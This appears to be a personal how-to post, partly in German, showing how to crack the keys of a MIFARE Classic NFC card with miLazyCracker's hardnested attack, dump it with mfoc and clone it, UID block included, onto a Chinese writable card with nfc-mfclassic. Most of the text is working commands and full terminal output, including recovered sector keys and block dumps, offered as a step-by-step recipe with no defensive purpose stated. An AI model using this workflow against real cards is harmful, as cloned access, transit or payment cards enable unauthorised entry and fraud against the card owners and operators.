Find out the Keys of a NFC Chip with miLazyCracker, Dump the Card with the hacked keys, Clone the dump onto a second card, Check if the contents are the same and change the manufacture block 0 with some china cards (mfcuk and mfoc command).
Find out which card
Buy an ACR122U
- ACS ACR122U. Schnittstelle: USB 2.0. Maße (B x T x H): 65 x 12,8 x 98 mm
- USB
- Gewicht: 70 g. Unterstützt des Windows-Betriebssystem: Windows 2000, Windows 2000 Professional, Windows 7 Home Basic, Windows 7 Home Basic x64, Windows 7...
- Unterstützt andere Betriebssysteme: Android. Zertifizierung: ISO 14443
- Dieses
- FCC
- KC
- VCCI
- PC/SC
- CCID
Find out the Keys
Execute the miLazyCracker command (after installation)
Found key: 81cc25ebbb6a
Found key: 3e65e4fb65b3
Geräte LED geht auf rot -> direkt neu einstecken (No NFC device found.)
Sonst bricht das Programm ab
Dump the card
Mfoc download: https://github.com/nfc-tools/mfoc/releases
Take a dump of the card if you know key a and b from step 1
mfoc -O carddump.dmp -k 3e65e4fb65b3 -k 81cc25ebbb6a
With default keys (not changed, fresh card): mfoc -O carddump.dmp
Clone to the second card
You need the dump of the original card (step 1) and the dump of the card you want to put on the values of the original card (cloned card)
nfc-mfclassic w a DUMPORIGINALCARD DUMPCLONECARD
Both dumps done with step 2
Mathiass-MBP:dump mathias$ nfc-mfclassic w a u original.dmp clone.dmp NFC reader: ACS ACR122U / ACR122U214 opened Found MIFARE Classic card: ISO/IEC 14443A (106 kbps) target: ATQA (SENS_RES): 00 04 UID (NFCID1): 7b 78 32 3c SAK (SEL_RES): 08 Guessing size: seems to be a 1024-byte card Writing 64 blocks |...............................................................| Done, 63 of 64 blocks written.
Check if the cards are the same
First original, second clone
Found out that the uid is different
Mathiass-MBP:mifare mathias$ nfc-list nfc-list uses libnfc libnfc-1.7.1-191-g216145f NFC device: ACS ACR122U / ACR122U214 opened 1 ISO14443A passive target(s) found: ISO/IEC 14443A (106 kbps) target: ATQA (SENS_RES): 00 44 UID (NFCID1): 04 e8 f9 c2 a5 59 80 SAK (SEL_RES): 08 Mathiass-MBP:mifare mathias$ nfc-list nfc-list uses libnfc libnfc-1.7.1-191-g216145f NFC device: ACS ACR122U / ACR122U214 opened 1 ISO14443A passive target(s) found: ISO/IEC 14443A (106 kbps) target: ATQA (SENS_RES): 00 04 UID (NFCID1): 7b 78 32 3c SAK (SEL_RES): 08
Check the contents
mfoc -O original.dmp -k 3e65e4fb65b3 -k 81cc25ebbb6a
mfoc -O clone.dmp -k 3e65e4fb65b3 -k 81cc25ebbb6a
Mathiass-MBP:dump mathias$ hexdump -vC clone.dmp > clone.hex
Mathiass-MBP:dump mathias$ hexdump -vC original.dmp > original.hex
Mathiass-MBP:dump mathias$ diff clone.hex original.hex
Mathiass-MBP:dump mathias$ diff original.hex test.hex
1c1
< 00000000 04 e8 f9 c2 a5 59 80 88 44 00 c8 20 00 00 00 00 |.....Y..D.. ....|
---
> 00000000 7b 78 32 3c 0d 08 04 00 01 6f 01 6d 45 68 f8 1d |{x2<.....o.mEh..|Now you can see that just the first block with the uid of the card is different.
Change also block zero 0
nfc-mfclassic W a original.dmp clone.dmp
Mathiass-MBP:check mathias$ mfoc -O clone.dmp -k 3e65e4fb65b3 -k 81cc25ebbb6a
The custom key 0x3e65e4fb65b3 has been added to the default keys
The custom key 0x81cc25ebbb6a has been added to the default keys
Found Mifare Classic 1k tag
ISO/IEC 14443A (106 kbps) target:
ATQA (SENS_RES): 00 04
* UID size: single
* bit frame anticollision supported
UID (NFCID1): 7b 78 32 3c
SAK (SEL_RES): 08
* Not compliant with ISO/IEC 14443-4
* Not compliant with ISO/IEC 18092
Fingerprinting based on MIFARE type Identification Procedure:
* MIFARE Classic 1K
* MIFARE Plus (4 Byte UID or 4 Byte RID) 2K, Security level 1
* SmartMX with MIFARE 1K emulation
Other possible matches based on ATQA & SAK values:
Try to authenticate to all sectors with default keys…
Symbols: ‚.‘ no key found, ‚/‘ A key found, ‚\‘ B key found, ‚x‘ both keys found
[Key: 3e65e4fb65b3] -> [….///////////.]
[Key: 81cc25ebbb6a] -> [….xxxxxxxxxxx.]
[Key: ffffffffffff] -> [xxxxxxxxxxxxxxxx]
[Key: a0a1a2a3a4a5] -> [xxxxxxxxxxxxxxxx]
[Key: d3f7d3f7d3f7] -> [xxxxxxxxxxxxxxxx]
[Key: 000000000000] -> [xxxxxxxxxxxxxxxx]
[Key: b0b1b2b3b4b5] -> [xxxxxxxxxxxxxxxx]
[Key: 4d3a99c351dd] -> [xxxxxxxxxxxxxxxx]
[Key: 1a982c7e459a] -> [xxxxxxxxxxxxxxxx]
[Key: aabbccddeeff] -> [xxxxxxxxxxxxxxxx]
[Key: 714c5c886e97] -> [xxxxxxxxxxxxxxxx]
[Key: 587ee5f9350f] -> [xxxxxxxxxxxxxxxx]
[Key: a0478cc39091] -> [xxxxxxxxxxxxxxxx]
[Key: 533cb6c723f6] -> [xxxxxxxxxxxxxxxx]
[Key: 8fd0a4f256e9] -> [xxxxxxxxxxxxxxxx]
Sector 00 – Found Key A: ffffffffffff Found Key B: ffffffffffff
Sector 01 – Found Key A: ffffffffffff Found Key B: ffffffffffff
Sector 02 – Found Key A: ffffffffffff Found Key B: ffffffffffff
Sector 03 – Found Key A: ffffffffffff Found Key B: ffffffffffff
Sector 04 – Found Key A: 3e65e4fb65b3 Found Key B: 81cc25ebbb6a
Sector 05 – Found Key A: 3e65e4fb65b3 Found Key B: 81cc25ebbb6a
Sector 06 – Found Key A: 3e65e4fb65b3 Found Key B: 81cc25ebbb6a
Sector 07 – Found Key A: 3e65e4fb65b3 Found Key B: 81cc25ebbb6a
Sector 08 – Found Key A: 3e65e4fb65b3 Found Key B: 81cc25ebbb6a
Sector 09 – Found Key A: 3e65e4fb65b3 Found Key B: 81cc25ebbb6a
Sector 10 – Found Key A: 3e65e4fb65b3 Found Key B: 81cc25ebbb6a
Sector 11 – Found Key A: 3e65e4fb65b3 Found Key B: 81cc25ebbb6a
Sector 12 – Found Key A: 3e65e4fb65b3 Found Key B: 81cc25ebbb6a
Sector 13 – Found Key A: 3e65e4fb65b3 Found Key B: 81cc25ebbb6a
Sector 14 – Found Key A: 3e65e4fb65b3 Found Key B: 81cc25ebbb6a
Sector 15 – Found Key A: ffffffffffff Found Key B: ffffffffffff
We have all sectors encrypted with the default keys..
Auth with all sectors succeeded, dumping keys to a file!
Block 63, type A, key ffffffffffff :00 00 00 00 00 00 ff 07 80 69 ff ff ff ff ff ff
Block 62, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 61, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 60, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 59, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 78 77 88 69 00 00 00 00 00 00
Block 58, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 57, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 56, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
………
Mathiass-MBP:check mathias$ mfoc -O original.dmp -k 3e65e4fb65b3 -k 81cc25ebbb6a
The custom key 0x3e65e4fb65b3 has been added to the default keys
The custom key 0x81cc25ebbb6a has been added to the default keys
Found Mifare Classic 1k tag
ISO/IEC 14443A (106 kbps) target:
ATQA (SENS_RES): 00 44
* UID size: double
* bit frame anticollision supported
UID (NFCID1): 04 e8 f9 c2 a5 59 80
SAK (SEL_RES): 08
* Not compliant with ISO/IEC 14443-4
* Not compliant with ISO/IEC 18092
Fingerprinting based on MIFARE type Identification Procedure:
* MIFARE Classic 1K
* MIFARE Plus (7 Byte UID) 2K, Security level 1
Other possible matches based on ATQA & SAK values:
Try to authenticate to all sectors with default keys…
Symbols: ‚.‘ no key found, ‚/‘ A key found, ‚\‘ B key found, ‚x‘ both keys found
[Key: 3e65e4fb65b3] -> [….///////////.]
[Key: 81cc25ebbb6a] -> [….xxxxxxxxxxx.]
[Key: ffffffffffff] -> [xxxxxxxxxxxxxxxx]
[Key: a0a1a2a3a4a5] -> [xxxxxxxxxxxxxxxx]
[Key: d3f7d3f7d3f7] -> [xxxxxxxxxxxxxxxx]
[Key: 000000000000] -> [xxxxxxxxxxxxxxxx]
[Key: b0b1b2b3b4b5] -> [xxxxxxxxxxxxxxxx]
[Key: 4d3a99c351dd] -> [xxxxxxxxxxxxxxxx]
[Key: 1a982c7e459a] -> [xxxxxxxxxxxxxxxx]
[Key: aabbccddeeff] -> [xxxxxxxxxxxxxxxx]
[Key: 714c5c886e97] -> [xxxxxxxxxxxxxxxx]
[Key: 587ee5f9350f] -> [xxxxxxxxxxxxxxxx]
[Key: a0478cc39091] -> [xxxxxxxxxxxxxxxx]
[Key: 533cb6c723f6] -> [xxxxxxxxxxxxxxxx]
[Key: 8fd0a4f256e9] -> [xxxxxxxxxxxxxxxx]
Sector 00 – Found Key A: ffffffffffff Found Key B: ffffffffffff
Sector 01 – Found Key A: ffffffffffff Found Key B: ffffffffffff
Sector 02 – Found Key A: ffffffffffff Found Key B: ffffffffffff
Sector 03 – Found Key A: ffffffffffff Found Key B: ffffffffffff
Sector 04 – Found Key A: 3e65e4fb65b3 Found Key B: 81cc25ebbb6a
Sector 05 – Found Key A: 3e65e4fb65b3 Found Key B: 81cc25ebbb6a
Sector 06 – Found Key A: 3e65e4fb65b3 Found Key B: 81cc25ebbb6a
Sector 07 – Found Key A: 3e65e4fb65b3 Found Key B: 81cc25ebbb6a
Sector 08 – Found Key A: 3e65e4fb65b3 Found Key B: 81cc25ebbb6a
Sector 09 – Found Key A: 3e65e4fb65b3 Found Key B: 81cc25ebbb6a
Sector 10 – Found Key A: 3e65e4fb65b3 Found Key B: 81cc25ebbb6a
Sector 11 – Found Key A: 3e65e4fb65b3 Found Key B: 81cc25ebbb6a
Sector 12 – Found Key A: 3e65e4fb65b3 Found Key B: 81cc25ebbb6a
Sector 13 – Found Key A: 3e65e4fb65b3 Found Key B: 81cc25ebbb6a
Sector 14 – Found Key A: 3e65e4fb65b3 Found Key B: 81cc25ebbb6a
Sector 15 – Found Key A: ffffffffffff Found Key B: ffffffffffff
We have all sectors encrypted with the default keys..
Auth with all sectors succeeded, dumping keys to a file!
Block 63, type A, key ffffffffffff :00 00 00 00 00 00 ff 07 80 69 ff ff ff ff ff ff
Block 62, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 61, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 60, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 59, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 78 77 88 69 00 00 00 00 00 00
Block 58, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 57, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 56, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 55, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 78 77 88 69 00 00 00 00 00 00
Block 54, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 53, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 52, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 51, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 78 77 88 69 00 00 00 00 00 00
Block 50, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 49, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
……………..
Block 09, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 08, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 07, type A, key ffffffffffff :00 00 00 00 00 00 ff 07 80 69 ff ff ff ff ff ff
Block 06, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 05, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 04, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 03, type A, key ffffffffffff :00 00 00 00 00 00 ff 07 80 69 ff ff ff ff ff ff
Block 02, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 01, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 00, type A, key ffffffffffff :04 e8 f9 c2 a5 59 80 88 44 00 c8 20 00 00 00 00
Mathiass-MBP:check mathias$
Mathiass-MBP:mifare mathias$ miLazyCracker Found Mifare Classic 1k tag ISO/IEC 14443A (106 kbps) target: ATQA (SENS_RES): 00 44 * UID size: double * bit frame anticollision supported UID (NFCID1): 04 e8 f9 c2 a5 59 80 SAK (SEL_RES): 08 * Not compliant with ISO/IEC 14443-4 * Not compliant with ISO/IEC 18092 Fingerprinting based on MIFARE type Identification Procedure: * MIFARE Classic 1K * MIFARE Plus (7 Byte UID) 2K, Security level 1 Other possible matches based on ATQA & SAK values: Try to authenticate to all sectors with default keys... Symbols: '.' no key found, '/' A key found, '\' B key found, 'x' both keys found [Key: ffffffffffff] -> [xxxx...........x] [Key: a0a1a2a3a4a5] -> [xxxx...........x] [Key: d3f7d3f7d3f7] -> [xxxx...........x] [Key: 000000000000] -> [xxxx...........x] [Key: b0b1b2b3b4b5] -> [xxxx...........x] [Key: 4d3a99c351dd] -> [xxxx...........x] [Key: 1a982c7e459a] -> [xxxx...........x] [Key: aabbccddeeff] -> [xxxx...........x] [Key: 714c5c886e97] -> [xxxx...........x] [Key: 587ee5f9350f] -> [xxxx...........x] [Key: a0478cc39091] -> [xxxx...........x] [Key: 533cb6c723f6] -> [xxxx...........x] [Key: 8fd0a4f256e9] -> [xxxx...........x] Sector 00 - Found Key A: ffffffffffff Found Key B: ffffffffffff Sector 01 - Found Key A: ffffffffffff Found Key B: ffffffffffff Sector 02 - Found Key A: ffffffffffff Found Key B: ffffffffffff Sector 03 - Found Key A: ffffffffffff Found Key B: ffffffffffff Sector 04 - Unknown Key A Unknown Key B Sector 05 - Unknown Key A Unknown Key B Sector 06 - Unknown Key A Unknown Key B Sector 07 - Unknown Key A Unknown Key B Sector 08 - Unknown Key A Unknown Key B Sector 09 - Unknown Key A Unknown Key B Sector 10 - Unknown Key A Unknown Key B Sector 11 - Unknown Key A Unknown Key B Sector 12 - Unknown Key A Unknown Key B Sector 13 - Unknown Key A Unknown Key B Sector 14 - Unknown Key A Unknown Key B Sector 15 - Found Key A: ffffffffffff Found Key B: ffffffffffff Using sector 00 as an exploit sector Card is not vulnerable to nested attack MFOC not possible, detected hardened Mifare Classic Trying HardNested Attack... libnfc_crypto1_crack ffffffffffff 60 B 56 B mfc_04e8f9c2a55980_foundKeys.txt Found tag with uid c2a55980, collecting nonces for key B of block 56 (sector 14) using known key B ffffffffffff for block 60 (sector 15) Collected 1909 nonces... leftover complexity 1186294334976 (~2^40.11) - press enter to start brute-force phase Collected 1919 nonces... leftover complexity 1186294334976 (~2^40.11) - initializing brute-force phase... Starting 8 threads to test 1186294334976 states using 256-way bitslicing Cracking... 47.72% Found key: 81cc25ebbb6a Tested 566767883890 states 81cc25ebbb6a mfoc -f mfc_04e8f9c2a55980_foundKeys.txt -O mfc_04e8f9c2a55980_dump.mfd -D mfc_04e8f9c2a55980_unknownMfocSectorInfo.txt The custom key 0x81cc25ebbb6a has been added to the default keys Found Mifare Classic 1k tag ISO/IEC 14443A (106 kbps) target: ATQA (SENS_RES): 00 44 * UID size: double * bit frame anticollision supported UID (NFCID1): 04 e8 f9 c2 a5 59 80 SAK (SEL_RES): 08 * Not compliant with ISO/IEC 14443-4 * Not compliant with ISO/IEC 18092 Fingerprinting based on MIFARE type Identification Procedure: * MIFARE Classic 1K * MIFARE Plus (7 Byte UID) 2K, Security level 1 Other possible matches based on ATQA & SAK values: Try to authenticate to all sectors with default keys... Symbols: '.' no key found, '/' A key found, '\' B key found, 'x' both keys found [Key: 81cc25ebbb6a] -> [....\\\\\\\\\\\.] [Key: ffffffffffff] -> [xxxx\\\\\\\\\\\x] [Key: a0a1a2a3a4a5] -> [xxxx\\\\\\\\\\\x] [Key: d3f7d3f7d3f7] -> [xxxx\\\\\\\\\\\x] [Key: 000000000000] -> [xxxx\\\\\\\\\\\x] [Key: b0b1b2b3b4b5] -> [xxxx\\\\\\\\\\\x] [Key: 4d3a99c351dd] -> [xxxx\\\\\\\\\\\x] [Key: 1a982c7e459a] -> [xxxx\\\\\\\\\\\x] [Key: aabbccddeeff] -> [xxxx\\\\\\\\\\\x] [Key: 714c5c886e97] -> [xxxx\\\\\\\\\\\x] [Key: 587ee5f9350f] -> [xxxx\\\\\\\\\\\x] [Key: a0478cc39091] -> [xxxx\\\\\\\\\\\x] [Key: 533cb6c723f6] -> [xxxx\\\\\\\\\\\x] [Key: 8fd0a4f256e9] -> [xxxx\\\\\\\\\\\x] Sector 00 - Found Key A: ffffffffffff Found Key B: ffffffffffff Sector 01 - Found Key A: ffffffffffff Found Key B: ffffffffffff Sector 02 - Found Key A: ffffffffffff Found Key B: ffffffffffff Sector 03 - Found Key A: ffffffffffff Found Key B: ffffffffffff Sector 04 - Unknown Key A Found Key B: 81cc25ebbb6a Sector 05 - Unknown Key A Found Key B: 81cc25ebbb6a Sector 06 - Unknown Key A Found Key B: 81cc25ebbb6a Sector 07 - Unknown Key A Found Key B: 81cc25ebbb6a Sector 08 - Unknown Key A Found Key B: 81cc25ebbb6a Sector 09 - Unknown Key A Found Key B: 81cc25ebbb6a Sector 10 - Unknown Key A Found Key B: 81cc25ebbb6a Sector 11 - Unknown Key A Found Key B: 81cc25ebbb6a Sector 12 - Unknown Key A Found Key B: 81cc25ebbb6a Sector 13 - Unknown Key A Found Key B: 81cc25ebbb6a Sector 14 - Unknown Key A Found Key B: 81cc25ebbb6a Sector 15 - Found Key A: ffffffffffff Found Key B: ffffffffffff Using sector 00 as an exploit sector Card is not vulnerable to nested attack MFOC not possible, detected hardened Mifare Classic Trying HardNested Attack... libnfc_crypto1_crack ffffffffffff 60 B 56 A mfc_04e8f9c2a55980_foundKeys.txt Found tag with uid c2a55980, collecting nonces for key A of block 56 (sector 14) using known key B ffffffffffff for block 60 (sector 15) Collected 1584 nonces... leftover complexity 1922805806080 (~2^40.81) - initializing brute-force phase... Starting 8 threads to test 1922805806080 states using 256-way bitslicing Cracking... 78.92% Found key: 3e65e4fb65b3 Tested 1517855538104 states 81cc25ebbb6a 3e65e4fb65b3 mfoc -f mfc_04e8f9c2a55980_foundKeys.txt -O mfc_04e8f9c2a55980_dump.mfd -D mfc_04e8f9c2a55980_unknownMfocSectorInfo.txt The custom key 0x81cc25ebbb6a has been added to the default keys The custom key 0x3e65e4fb65b3 has been added to the default keys Found Mifare Classic 1k tag ISO/IEC 14443A (106 kbps) target: ATQA (SENS_RES): 00 44 * UID size: double * bit frame anticollision supported UID (NFCID1): 04 e8 f9 c2 a5 59 80 SAK (SEL_RES): 08 * Not compliant with ISO/IEC 14443-4 * Not compliant with ISO/IEC 18092 Fingerprinting based on MIFARE type Identification Procedure: * MIFARE Classic 1K * MIFARE Plus (7 Byte UID) 2K, Security level 1 Other possible matches based on ATQA & SAK values: Try to authenticate to all sectors with default keys... Symbols: '.' no key found, '/' A key found, '\' B key found, 'x' both keys found [Key: 81cc25ebbb6a] -> [....\\\\\\\\\\\.] [Key: 3e65e4fb65b3] -> [....xxxxxxxxxxx.] [Key: ffffffffffff] -> [xxxxxxxxxxxxxxxx] [Key: a0a1a2a3a4a5] -> [xxxxxxxxxxxxxxxx] [Key: d3f7d3f7d3f7] -> [xxxxxxxxxxxxxxxx] [Key: 000000000000] -> [xxxxxxxxxxxxxxxx] [Key: b0b1b2b3b4b5] -> [xxxxxxxxxxxxxxxx] [Key: 4d3a99c351dd] -> [xxxxxxxxxxxxxxxx] [Key: 1a982c7e459a] -> [xxxxxxxxxxxxxxxx] [Key: aabbccddeeff] -> [xxxxxxxxxxxxxxxx] [Key: 714c5c886e97] -> [xxxxxxxxxxxxxxxx] [Key: 587ee5f9350f] -> [xxxxxxxxxxxxxxxx] [Key: a0478cc39091] -> [xxxxxxxxxxxxxxxx] [Key: 533cb6c723f6] -> [xxxxxxxxxxxxxxxx] [Key: 8fd0a4f256e9] -> [xxxxxxxxxxxxxxxx] Sector 00 - Found Key A: ffffffffffff Found Key B: ffffffffffff Sector 01 - Found Key A: ffffffffffff Found Key B: ffffffffffff Sector 02 - Found Key A: ffffffffffff Found Key B: ffffffffffff Sector 03 - Found Key A: ffffffffffff Found Key B: ffffffffffff Sector 04 - Found Key A: 3e65e4fb65b3 Found Key B: 81cc25ebbb6a Sector 05 - Found Key A: 3e65e4fb65b3 Found Key B: 81cc25ebbb6a Sector 06 - Found Key A: 3e65e4fb65b3 Found Key B: 81cc25ebbb6a Sector 07 - Found Key A: 3e65e4fb65b3 Found Key B: 81cc25ebbb6a Sector 08 - Found Key A: 3e65e4fb65b3 Found Key B: 81cc25ebbb6a Sector 09 - Found Key A: 3e65e4fb65b3 Found Key B: 81cc25ebbb6a Sector 10 - Found Key A: 3e65e4fb65b3 Found Key B: 81cc25ebbb6a Sector 11 - Found Key A: 3e65e4fb65b3 Found Key B: 81cc25ebbb6a Sector 12 - Found Key A: 3e65e4fb65b3 Found Key B: 81cc25ebbb6a Sector 13 - Found Key A: 3e65e4fb65b3 Found Key B: 81cc25ebbb6a Sector 14 - Found Key A: 3e65e4fb65b3 Found Key B: 81cc25ebbb6a Sector 15 - Found Key A: ffffffffffff Found Key B: ffffffffffff We have all sectors encrypted with the default keys.. Auth with all sectors succeeded, dumping keys to a file! Block 63, type A, key ffffffffffff :00 00 00 00 00 00 ff 07 80 69 ff ff ff ff ff ff Block 62, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Block 61, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Block 60, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Block 59, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 78 77 88 69 00 00 00 00 00 00 Block 58, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Block 57, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Block 56, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Block 55, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 78 77 88 69 00 00 00 00 00 00 Block 54, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 .......... Block 04, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Block 03, type A, key ffffffffffff :00 00 00 00 00 00 ff 07 80 69 ff ff ff ff ff ff Block 02, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Block 01, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Block 00, type A, key ffffffffffff :04 e8 f9 c2 a5 59 80 88 44 00 c8 20 00 00 00 00 Dump left in: mfc_04e8f9c2a55980_dump.mfd Do you want clone the card? Place card on reader now and press Y [y/n] y Usage: nfc-mfclassic f|r|R|w|W a|b u|U<01ab23cd> <dump.mfd> [<keys.mfd> [f]] f|r|R|w|W - Perform format (f) or read from (r) or unlocked read from (R) or write to (w) or unlocked write to (W) card *** format will reset all keys to FFFFFFFFFFFF and all data to 00 and all ACLs to default *** unlocked read does not require authentication and will reveal A and B keys *** note that unlocked write will attempt to overwrite block 0 including UID *** unlocking only works with special Mifare 1K cards (Chinese clones) a|A|b|B - Use A or B keys for action; Halt on errors (a|b) or tolerate errors (A|B) u|U - Use any (u) uid or supply a uid specifically as U01ab23cd. <dump.mfd> - MiFare Dump (MFD) used to write (card to MFD) or (MFD to card) <keys.mfd> - MiFare Dump (MFD) that contain the keys (optional) f - Force using the keyfile even if UID does not match (optional) Examples: Read c nfc-mfclassic f B u dummy.mfd keyfile.mfd f Read card to file, using key A and uid 0x01 0xab 0x23 0xcd: nfc-mfclassic r a U01ab23cd mycard.mfd
Any way to have the files to compile the libnfc_crypto1_crack binary ?
https://github.com/ilumitr/miLazyCracker